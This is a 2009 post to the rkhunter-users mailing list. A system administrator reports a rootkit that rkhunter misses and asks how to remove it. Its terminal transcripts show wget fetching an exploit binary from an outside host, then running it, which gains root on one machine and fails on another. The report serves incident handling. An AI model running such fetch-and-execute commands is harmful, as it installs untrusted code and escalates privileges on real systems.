[Rkhunter-users] rootkit not found by rkhunter

Mon, 05 Oct 2009 11:29:04 -0700 

  I have a rootkit installed on a bunch of machines that rkhunter
  does not find. This appears after infection with SHV4 / SHV5,
  which rkhunter found.

  Here it works to allow a non-root user to become root

kric...@fricka:~$ mkdir a
kric...@fricka:~$ cd a
kric...@fricka:~/a$ ls -l
total 0
kric...@fricka:~/a$  wget webmail.facill.com.br/a
--2009-10-04 07:47:42--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       6.88K/s   in 1.0s    

2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]

kric...@fricka:~/a$ chmod 777 a
kric...@fricka:~/a$ ./a
r...@fricka:~/a# 

  Here is a situation where it does not work 

kric...@chichek:~$ mkdir a
kric...@chichek:~$ cd a
kric...@chichek:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:31:15--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       37.8K/s   in 0.2s    

2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]

kric...@chichek:~/a$ chmod 777 a
kric...@chichek:~/a$ ./a
mmap: Permission denied


  Does anybody here know how to delete this kit?


  Cheers,

  Thomas Krichel                    http://openlib.org/home/krichel
                                RePEc:per:1965-06-05:thomas_krichel
                                               skype: thomaskrichel


------------------------------------------------------------------------------
Come build with us! The BlackBerry® Developer Conference in SF, CA
is the only developer event you need to attend this year. Jumpstart your
developing skills, take BlackBerry mobile applications to market and stay 
ahead of the curve. Join us from November 9-12, 2009. Register now!
http://p.sf.net/sfu/devconf
_______________________________________________
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Reply via email to